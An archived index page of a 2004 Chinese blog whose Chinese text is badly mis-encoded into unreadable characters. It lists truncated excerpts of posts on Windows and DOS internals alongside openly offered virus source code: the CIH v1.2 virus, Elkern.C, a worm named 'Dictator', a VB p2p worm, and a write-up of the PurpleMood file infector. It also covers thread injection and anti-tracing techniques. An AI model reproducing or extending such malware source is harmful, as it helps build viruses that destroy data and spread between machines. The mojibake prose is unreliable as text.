U148 Archive

Markdown archive served by Next.js

Áè³½Èıµã

来源: BlogBus 原始链接: http://blogbus.com:80/blogbus/blog/index.php?blogid=5836 存档链接: https://web.archive.org/web/20041215082005id_/http://blogbus.com:80/blogbus/blog/index.php?blogid=5836

Áè³½Èıµã ¼Ç¼һЩ×Ô¼º×ÊÁÏ Ê×Ò³ ϵͳµ×²ã (24) ²¡¶¾ (16) ·ÖÒ³: [1] [2] [3] ÎÒĞ´µÄ²¡¶¾ÒßÃç³ÌĞò -[²¡¶¾] ʱ¼ä£º2004-01-03 03:32 .386.model flat,stdcalloption casemap:noneinclude \masm32\include\windows.incinclude \masm32\include\kernel32.incinclude \masm32\include\user32.incincludelib \masm32\lib\kernel32.libincludelib \masm32\lib\user32.lib;ÕâÊÇһЩÏà¹ØµÄ¶¨Ò壬;------------------------------------(ÉÏÃæµÄ)--.datamcaption db "ÄãºÃÅóÓÑ!",0mtitle db "±êÌâ.............. seath ·¢±íÓÚ 03:32 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ ÎÒ±àĞ´µÄ²¡¶¾Trojan.Dicta.5632 -[²¡¶¾] ʱ¼ä£º2004-01-03 03:31 ÎÒ±àĞ´µÄ²¡¶¾Trojan.Dicta.5632 --------------------------------------------------------------------------------±à¼­: À´Ô´:EkenChan Àà±ğ:°²È«Ö®ÄÑ ÈÕÆÚ:2002.02.18 ½ñÈÕ/×Üä¯ÀÀ: 3/2086 ¡¡¡¡;============= ;INSTRUCTIONS: ;======================= ;WormName: Dictator ;Author: Eken Chan ;Version: Alpha 1.0 ;Infect:&nbs.............. seath ·¢±íÓÚ 03:31 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(1) | ÒıÓÃ(Trackback0) | ±à¼­ ¶¯Ì¬µÄ²éÕÒKernel32.dllµÄÄ£¿é¾ä±úÓë GetProcAddressµÄAPIº¯ÊıµØÖ·¡¡¡¡ -[²¡¶¾] ʱ¼ä£º2004-01-03 03:31 ;ÊÊÓÃϵͳWin9x/me/2k/xp/ntextrn MessageBoxA: procextrn ExitProcess: procinclude wap32.inc .386.model flat,stdcall .datadb 0.code Start: mov eax,[esp] ;//È¡Kernel32·µ»ØµØÖ· and ax,0f000h mov esi,eax ;//µÃµ½Kernel.PELoader´úÂëλÖÃ(²»¾«È·)LoopFindKernel32: sub&nbs.............. seath ·¢±íÓÚ 03:31 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ WIN9XÄÚºËÏß³Ì×¢Èë¼°½ø³Ì²»ËÀ¼¼ -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:30 ÎÒÃÇÖªµÀÔÚNTÄÚºËÏ¿ÉÒÔͨ¹ıCreateRemoteThread²åÈëµ½ÆäËû½ø³ÌµØÖ·¿Õ¼ä£¬ÕâÑù¿ÉÒÔÈÃÎÒÃǵÄÏß³ÌÍÑÀë±¾ÉíµÄ½ø³Ì¶ø´æÔÚ£¬µ«ÔÚWIN9XÏÂÔò²»ĞĞ£¬µ«ÔÚWHGµÄÖйúºÚ¿ÍÖĞÈ´¼ÓÈëÁËWIN9XÄÚºËÏß³Ì×¢Èë¼¼Êõ£¬¿ÉÒÔ½«×Ô¼ºµÄÏß³Ì×¢Èëµ½KERNEL32¡£DLLÖĞ£¬µ«ÔÚËûµÄ´úÂëÖĞÊÇͨ¹ıWinExecÀ´ÊµÏÖ´ÓÆô²¡¶¾½ø³Ì£¬¶øÔÚWIN32ÏÂ×îºÃÊÇͨ¹ıCreateProcessAÀ´ÊµÏÖ£¬¿É¸Ãº¯ÊıÔÚÖ´ĞĞʱ£¬±ØĞëÍùÏàÓ¦µÄÄÚ´æÖĞĞ´ÈëStartInfo £¬ProcessInfo µÈĞÅÏ¢£¬¶.............. seath ·¢±íÓÚ 03:30 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ SEH in ASM Ñо¿ -[²¡¶¾] ʱ¼ä£º2004-01-03 03:30 SEH in ASM Ñо¿By Hume/ÀäÓêÆ®ĞÄ ÎªÊ²Ã´Àϵ÷Öص¯: SEH³öÏÖÒѾø·ÇÒ»ÈÕ,µ«ºÜ¶àÈË¿ÉÄÜ»¹²»³¹µ×Á˽âSehµÄÔËĞĞ»úÖÆ;ÓйØsehµÄ֪ʶ×ÊÁϲ»ÊǺܶà,asm¼¶µÄÏêϸ×ÊÁϾ͸üÉÙ!seh²»½ö¿ÉÒÔ¼ò»¯³ÌĞò´íÎó´¦Àí,ʹÄãµÄ³ÌĞò¸ü¼Ó½¡×³,»¹±»¹ã·ºÓ¦ÓÃÓÚ·´¸ú×ÙÒÔ¼°¼Ó½âÃÜÖĞ,Òò´Ë,Á˽âseh·Ç³£±ØÒª,µ«Òź¶µÄÊǹØÓÚsehÏêϸ½éÉܵÄÖĞÎÄ×ÊÁϷdz£ÉÙ,ÔÚʵ¼ùµÄ»ù´¡ÉÏ,°Ñ×Ô¼ºÑ§Ï°µÄÒ»µã±Ê¼Ç·îÏ׸ø´ó¼Ò,Ï£Íû¶Ôϲ»¶ASMµÄÅóÓ.............. seath ·¢±íÓÚ 03:30 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ p2pÈä³æµÄ´úÂë -[²¡¶¾] ʱ¼ä£º2004-01-03 03:30 Sub fORM_lOAD()If App.PrevInstance = True Then EndEnd If Set fso = CreateObject("Scripting.FileSystemObject") Set windir = fso.GetSpecialFolder(0) If (Not (fso.FolderExists(windir & "" & "fonts^-^"))) Then fso.CreateFolder windir & .............. seath ·¢±íÓÚ 03:30 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ Elkern.CÔ´´úÂë -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:29 .386.model flat include win32.incincludelib import32.libextrn MessageBoxA: procextrn ExitProcess: procextrn CreateProcessA: proc DEBUG equ 1 if DEBUGinclude debug.asmendif FMAP_NAME equ 'Wqk',0MUTEX_NAME equ 'Oux',0 INFPROC_PROT_SIZE equ (41024)INFPROC_MAP_SIZE equ (161024)INF_SIGN equ 'QW'MEM_INF_SIGN e.............. seath ·¢±íÓÚ 03:29 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ CIH1.2ÍêÈ«Ô´³ÌĞò -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:29 CIH v1.2Ô´³ÌĞò **************************************************************************** ; * The Virus Program Information * ; **************************************************************************** ; * Designer : CIH Original Place : TTIT of Taiwan * ; * Create Date : 04/26/1998 Now Version : 1.2 * ; * Modification Time : 05/2.............. seath ·¢±íÓÚ 03:29 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ MBR¼ÓÔعı³Ì -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:28 Èç¹û´ÓÈíÅÌÆğ¶¯,ÔòDosÒıµ¼³ÌĞò±»ROM BIOSÖ±½Ó¼ÓÔص½ÄÚ´æ,Èô´ÓÓ²ÅÌÆğ¶¯,Ôò±»Ó²ÅÌµÄ Ö÷Òıµ¼³ÌĞò¼ÓÔØ.²»¹ı¶¼ÊDZ»¼ÓÔص½ÄÚ´æµÄ¾ø¶ÔµØÖ·0000:7C00H´¦.Òò´Ë,DosÒıµ¼³ÌĞòµÄµÚÒ»ÌõÖ¸ÁîµÄµØÖ·Ò»¶¨ÊÇ0000:7C00H. DosÒıµ¼³ÌĞòËù×öµÄÊÂÇéÈçÏÂ: 1>µ÷Õû¶ÑջλÖà 2>ĞŞ¸Ä²¢ÓÃĞŞ¸ÄºóµÄ´ÅÅ̲ÎÊı±íÀ´¸´Î»´ÅÅÌϵͳ 3>¼ÆËã¸ùĿ¼±íµÄÊ×ÉÈÇøµÄλÖü°IO.SYSµÄÉÈÇøλÖà 4>¶ÁÈë¸ùĿ¼±íµÄÊ×ÉÈÇø 5>¼ì²é¸.............. seath ·¢±íÓÚ 03:28 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ ÖжϷ¢Éúʱºò -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:27 ÖжϷ¢Éúʱºò,CPU×Ô¶¯µ÷ÓÃÏàÓ¦µÄÖжϴ¦Àí³ÌĞò,ÕâĞ©Öжϴ¦Àí³ÌĞòµÄÈë¿ÚÖ¸Õë(±»³Æ×÷ÖжÏÏòÁ¿)Ò»°ã±»·ÅÔÚÒ»¸öÖ¸¶¨µÄλÖÃ,±ÈÈçBIOSÖжÏÏòÁ¿·ÅÔÚµØÖ·0-1KµÄ¿Õ¼äÄÚ,ÿ4¸ö×Ö½Ú´æ·ÅÒ»¸öÖжÏÏòÁ¿.¶øÔÚ±£»¤Ä£Ê½ÏÂ,BIOSÖжϲ»¿ÉÓÃ,ÖжÏÏòÁ¿±»·ÅÔÚIDTÖĞ,µ±Ò»¸öÖжϷ¢Éúʱ,CPU½«ÖжϺÅ×÷ΪË÷Òıµ½ÏàÓ¦µÄÖжϴ¦Àí³ÌĞò±íÖĞ(BIOSÖжÏÏòÁ¿±í(ʵģʽ)»òIDT(±£»¤Ä£Ê½))ÕÒµ½ÏàÓ¦µÄÖжϴ¦Àí³ÌĞòµÄÖ¸Õë,²¢Ö´ĞĞËü. ÁíÍâ,Öжϴ¦Àí³ÌĞòÓÃC/C++»¹Ê.............. seath ·¢±íÓÚ 03:27 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ Ö±½ÓIO¶ÁÓ²Å̵ÄÀı×Ó -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:27 Ö±½ÓIO¶ÁÓ²Å̵ÄÀı×Ó£º¶ÁÖ÷Òıµ¼ÉÈÇø code segment assume cs:codestart: push cs pop ds call waitfree jnz err mov dx,1f0h add dx,3 mov al,3fh;´Ë´¦3fhΪ¶ÁÈ¡3fhÉÈÇø out dx,al call waitfree jnz err mov al,0 i.............. seath ·¢±íÓÚ 03:27 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(1) | ÒıÓÃ(Trackback0) | ±à¼­ Ó²Å̲ÎÊıÊÍÒÉ -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:26 µÚÒ»²¿·Ö ¼ò ½é1,1Ò». Ó²Å̽ṹ¼ò½é

  1. Ó²Å̲ÎÊıÊÍÒÉ µ½Ä¿Ç°ÎªÖ¹, ÈËÃdz£ËµµÄÓ²Å̲ÎÊı»¹ÊǹÅÀ쵀 CHS (Cylinder/Head/Sector)²ÎÊı. ÄÇôΪʲôҪʹÓÃÕâĞ©²ÎÊı, ËüÃǵÄÒâÒåÊÇʲô?ËüÃǵÄÈ¡Öµ·¶Î§ÊÇʲô? ºÜ¾ÃÒÔÇ°, Ó²Å̵ÄÈİÁ¿»¹·Ç³£Ğ¡µÄʱºò, ÈËÃDzÉÓÃÓëÈíÅÌÀàËƵĽṹÉú²úÓ²ÅÌ. Ò²¾ÍÊÇÓ²ÅÌÅÌƬµÄÿһÌõ´ÅµÀ¶¼¾ßÓĞÏàͬµÄÉÈÇøÊı. Ó.............. seath ·¢±íÓÚ 03:26 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ Ó³Éä£Ò£Ï£Í£­£Â£É£Ï£ÓµØÖ· -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:26 ÄãÓÃÖ¸Áîint n¾ÍÊÇÈí¼şÖжÏ/Ä㰴һϼü¾Í»á²úÉúÓ²¼şÖжÏ/¶øÇÒÕâÊÇ¿ÉÆÁ±×ÖжÏ/ ¶øÄã°´ÏÂpower¼üÊÇ/¾Í²úÉúÁË·ÇÆÁ±×ÖжÏ

Ó³Éä£Ò£Ï£Í£­£Â£É£Ï£ÓµØÖ· ×÷ÕߣºÍõ¿É£¬Íõ´ä÷ ÕªÒª£º±¾ÎĽéÉÜÁËÒ»ÖÖÕë¶Ô£é£³£¸£¶ÒÔÉϣɣ£͸öÈ˼ÆËã»ú¶¯Ì¬¸ÄĞ´£Ò£Ï£Í£­£Â£É£Ï£Ó µÄ·½·¨£¬¶ÔÓÚ±àĞ´ÃÜÔ¿·ÂÕæ³ÌĞò»òµ÷Êԣ£ɣϣӳÌĞòÓнϸߵÄʵÓüÛÖµ¡£ ¹Ø¼ü´Ê£º£Ò£Ï£.............. seath ·¢±íÓÚ 03:26 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ Win32.PurpleMood.6736¼¼ÊõÎĵµ -[²¡¶¾] ʱ¼ä£º2004-01-03 03:25 Win32.PurpleMood.6736¼¼ÊõÎĵµ תÔØ£ºsquirrel£¨squirrel£© À´Ô´£ºXPurpleMood@163.com ²¡¶¾Ãû³Æ £ºPurpleMood (×ÏÉ«ĞÄÇé)ÊÊÓû·¾³£º Win9x/Winnt/Win2k/Winxp±àĞ´»·¾³£º Win2k,Masm32v6¼ò ½é£º1. ¸ĞȾ±¾µØÓ²Å̺ÍÍøÂçÉÏËùÓĞexe(GUI)Îļş &nbsp.............. seath ·¢±íÓÚ 03:25 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ ÏêÊö±£»¤Ä£Ê½Ï½öÄÜÓÃVxD´æÈ¡Ó²ÅÌÈÎÒâÉÈÇø -[ϵͳµ×²ã] ʱ¼ä£º2004-01-03 03:25 ÏêÊö±£»¤Ä£Ê½Ï½öÄÜÓÃVxD´æÈ¡Ó²ÅÌÈÎÒâÉÈÇø ÓÃVToolsD´´½¨µÄVxDÓжÁĞ´Ó²Å̵ľÖÏŞĞÔ,½ö¿ÉÓÃR0_ReadAbsoluteDisk¼°R0_WriteAbsoluteDisk,¶ÁĞ´Ó²ÅÌdos·ÖÇøÖеÄÉÈÇø. ÀıÈç,¿ÉÔÚÏìÓ¦32λC³ÌĞòµÄW32_DEVICEIOCONTROLÏûϢʱ,ÓÃR0_ReadAbsoluteDisk(2,1,0,buf,&w),¶Ádos·ÖÇøÖеÄÂß¼­0ÉÈÇø,´ËÉÈÇøÊÇdosµÄÒıµ¼ÉÈÇø,Ò»°ãλÓÚÓ²ÅÌ1Í·0ÖùÃæ1ÉÈÇø,´Ëʱ,·¢W32_DEVICEIOC.............. seath ·¢±íÓÚ 03:25 | ÔĶÁÈ«ÎÄ | ÆÀÂÛ(0) | ÒıÓÃ(Trackback0) | ±à¼­ ·ÖÒ³: [1] [2] [3] ÈÕÀú 2004 Äê 12 Ô Sun Mon Tue Wen Thu Fri Sat 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 ×îºó¸üĞ ÎÒĞ´µÄ²¡¶¾ÒßÃç³ÌĞò ÎÒ±àĞ´µÄ²¡¶¾Trojan.Dicta.5632 ¶¯Ì¬µÄ²éÕÒKernel32.dllµÄÄ£¿é¾ä±úÓë GetProcAddressµÄAPIº¯ÊıµØÖ·¡¡¡¡ WIN9XÄÚºËÏß³Ì×¢Èë¼°½ø³Ì²»ËÀ¼¼ SEH in ASM Ñо¿ p2pÈä³æµÄ´úÂë Elkern.CÔ´´úÂë CIH1.2ÍêÈ«Ô´³ÌĞò MBR¼ÓÔعı³Ì ÖжϷ¢Éúʱºò ×îĞÂÆÀÂÛ kevin_pan : Äܲ»ÄÜÉÔ΢À´µã×¢. ÎÊһϠ: ÄãΪʲôҪ±àĞ´²¡. jAsOn GuO : Õâ¸öBLOG²»´í£¬¾Í. ´æµµ ÎÒµÄÁ´½Ó http://yyisme.blogbus.com